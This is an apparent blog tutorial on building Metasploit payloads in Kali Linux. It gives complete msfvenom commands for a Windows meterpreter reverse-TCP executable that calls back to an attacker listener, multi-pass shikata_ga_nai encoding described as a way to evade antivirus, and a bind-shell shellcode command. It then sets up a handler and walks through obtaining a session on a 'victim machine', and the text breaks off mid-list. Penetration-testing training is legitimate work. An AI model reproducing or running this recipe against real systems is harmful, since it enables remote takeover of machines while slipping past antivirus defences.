Working with Payload Metasploit in Kali Linux

The Metasploit framework is a penetration testing tool for exploiting and validating vulnerabilities. It includes the fundamental architecture, particular content, and tools required for penetration testing and extensive security evaluation. It is a well-known exploitation framework that is routinely updated; new exploits are included as soon as they are announced. It includes a number of tools for constructing security workspaces for vulnerability and penetration testing systems.

There are several types of payloads in Metasploit. These three fundamental categories are the ones you’ll end up using the most.

Singles: Singles are small and are used to start a dialogue before going on to the next step.
Stagers: The payload uses the stager to create a network connection between the target machine and the payload processor on the Metasploit server. The stager enables you to load and insert a bigger, more complex payload known as the stage by utilizing a smaller payload.
Meterpreter: Meterpreter has evolved into a Metasploit attack payload that provides an intruder factor that influences how the target system browses and executes programs. Meterpreter is a memory-only program that does not write to the hard drive. Meterpreter attempted to inject itself into the attacked process, from where it might migrate to other functioning methods; as a result, no new processes were established. Meterpreter was designed to avoid the drawbacks of employing specific payloads while allowing command writing and ensuring encrypted connection. The disadvantage of using particular payloads is that if a newer process begins throughout the target system, alarms may be generated.

Basic payload creation with Metasploit in Kali Linux

Step 1: Access Msfconsole

Start Metasploit by using the following command.

msfconsole

Step 2: Access msfvenom

We will create a Reverse TCP payload with msfvenom. This payload generates an executable that, when executed, connects the user’s machine to our Metasploit handler, allowing us to conduct a meterpreter session. msfvenom has a wide range of options available.

msfvenom -h

Step 3: Construct a payload

To construct a payload in Metasploit on Kali Linux, run the following command.

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 -f exe -o payload.exe

You can specify the architecture, platform, and type of payload to use by using the -a, –platform, and -p options. Lhost appears to be the attacker’s IP address, to which the payload should be linked. Lport is identical to the above; this is the port to which the payload will connect, and it must be specified in the handler. -f tells Msfvenom how to produce the payload, which in this case is a program executable or exe.

Step 4: We’ll go to the home directory to see where it was generated. The accompanying screenshot shows that was successfully created.

Using an Encoder During Payload Generation

To avoid detection by anti-virus software, we can use an encoder while generating the payload. The encoder goes through the entire target payload from the data section and transforms each byte with a specific key.

Check out all the different encoders by typing the following command in your terminal.

msfvenom -l encoders

You can see we have applied the x86/shikata_ga_nai encoding to the same payload we created earlier.

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe

Generating Payloads with Multiple Passes

We can also encode the payload multiple times using -i and the number of times we want to encode it. The more iterations you encode a payload, the easier it is to avoid antivirus software.

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 -i 10 -e x86/shikata_ga_nai -f exe -o payload.exe

Payload Generation Failed

One of the wonderful benefits of this framework is the ability to build shellcode without the usage of specific characters. That doesn’t imply it’s infinite. If there are too many restricted bytes, no encoder may be able to do the task. At that moment, Metasploit will display the notice below.

It’s the equivalent of deleting too many letters from the alphabet and then asking someone to create a whole phrase. Sometimes it is just not possible.

Payload Generation Using a NOP Sled

A NOP sled (sometimes called a NOP slide) is a lengthy series of instructions that comes before shellcode. Although NOP sleds are not necessary to be included with shellcode, they are frequently added as part of an exploit to boost the probability of success. Shellcode developers can do this by inserting a big NOP sled directly before the shellcode. The shellcode will ultimately run as long as execution is directed someplace within the NOP sled.

msfvenom -a x64 –platform Windows -p windows/shell_bind_tcp -b ‘\x00\x0a\x0d\x20’ -i 3 -f python

Executing the Payload

Step 1: Copy the payload file to the target windows machine.

Step 2: We must now configure a listener on the port specified in the executable. The screenshot below illustrates the instructions to be entered into Metasploit. First, we’ll use the command “use multi/handler” to instruct Metasploit to utilize the generic payload handler “multi/handler”. We will then use the command “set payload windows/meterpreter/reverse_tcp” to match the payload set within the executable. Then we’ll set the LHOST and LPORT as follows: “set LHOST 192.168.1.9” and “LPORT 4444”. After that, type “run” or “exploit” and hit Enter.

The reverse TCP handler should start looking for a connection.

Step 3: Execute the payload and check the connection on the Kali Machine.

As you can see, we have now established a connection with the victim machine.

Step 4: You can do pretty much anything on the target computer once your meterpreter session is established. Here are several examples: